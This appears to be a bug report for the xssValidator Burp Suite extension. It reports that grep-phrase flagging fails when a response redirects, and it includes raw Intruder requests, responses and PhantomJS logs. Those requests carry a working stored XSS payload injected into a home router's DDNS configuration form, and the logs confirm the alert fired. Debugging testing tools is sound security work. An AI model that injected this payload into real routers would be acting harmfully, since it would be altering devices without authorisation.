30x redirection and grep phrase

[kulisu]

Hi again,

i found that xssValidator wont append the grep phrase to response while it got a 30x redirection.

but i can find the prompt from PhantomJS Output and BurpSuite Extender Output likes below,

On alert: 299792458
Response: {"value":1,"msg":"XSS found: alert(299792458)"}
XSS Found

this will cause BurpSuite Intruder wont flag the grep phrase.

thank you :)

Chris

---

Intruder options:

Attack Results

✓ Store requests
✓ Store responses
✓ Make unmodified baseline request
✓ Store full payloads

Grep - Match

✓ Flag result items with responses matching these expressions: fy7sdufsuidfhuisdf
✓ Match type: Simple string

Grep - Payloads

✓ Search responses for payload strings
✓ Match against pre-URL-encoded payloads

Redirections

✓ Follow redirections: In-scope only

---

Intruder Request 1:

POST /cgi-bin/setup_dns_ddns.exe HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Content-Length: 146
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close

page=dns_ddns_main&logout=&ddns_provider=0&ddns_domainame="%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c"&ddns_account=XSS4&ddns_password=XSS5

PhantomJS Output 1:

Received request with method type: POST
Processing Post Request
Beginning to parse page
    URL: http://192.168.1.1/cgi-bin/setup_dns_ddns.exe
    Headers: POST /cgi-bin/setup_dns_ddns.exe HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Content-Length: 146
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close

page=dns_ddns_main&logout=&ddns_provider=0&ddns_domainame="%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c"&ddns_account=XSS4&ddns_password=XSS5

Intruder Response 1:

HTTP/1.1 302 Found
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Location: http://192.168.1.1/wait.stm
Content-type: text/html

<HEAD><TITLE>302 Document moved</TITLE></HEAD>
<BODY><H1>302 Document moved</H1>
This document has moved <A HREF="http://192.168.1.1/wait.stm</A>.<P>
</BODY>
fy7sdufsuidfhuisdf

---

Intruder Request 2:

GET /wait.stm HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close

PhantomJS Output 2:

Received request with method type: POST
Processing Post Request
Beginning to parse page
    URL: http://192.168.1.1/wait.stm
    Headers: GET /wait.stm HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close


On alert: 299792458

Intruder Response 2:

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Content-type: text/html
Content-length: 1381
Accept-Ranges: bytes

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script language="javascript">
//setTimeout('document.location.href="dns_ddns_main.stm";', 10000);
var my_time = 10000 / 100;
var mybar = '';
var cur_time = 0;

function zero_run() {
    for (var i = 0 ; i < 100 ; i++) {
        mybar = mybar + '|';
//      window.status = i + '%' + ' ' + mybar;
        for (var j = 0 ; j < 10000 ; j++) ;
    }
//  window.status="";
    document.location.href="dns_ddns_main.stm";
}

function timebegin() {
    if (my_time == 0) {
        setTimeout("zero_run()", 100);
    }
    else if (cur_time < 100) {
        mybar = mybar + '|';
//      window.status = cur_time + '%' + ' ' + mybar;
        setTimeout("timebegin()", my_time);
        cur_time++;
    }
    else {
//      window.status="";
        document.location.href="dns_ddns_main.stm";
    }
}
timebegin();
</script>
<style type="text/css">
.waitcss {color: #FF6600; font-family: sans-serif; font-size: 9pt; text-align: left; font-weight : bold;}
</style>
</head>
<body bgcolor=#FFFFFF>
<p align=center>&nbsp;</p>
<p align=center>&nbsp;</p>
<p align=center>&nbsp;</p>
<p align=center>&nbsp;</p>
<p align=center>&nbsp;</p>
<p align=center><span class="waitcss">Guardando configuración. POR FAVOR NO APAGUES EL LIVEBOX<br><br><input type=image src="/images/clock.gif" border=0>&nbsp;</span></p>
</body>
</html>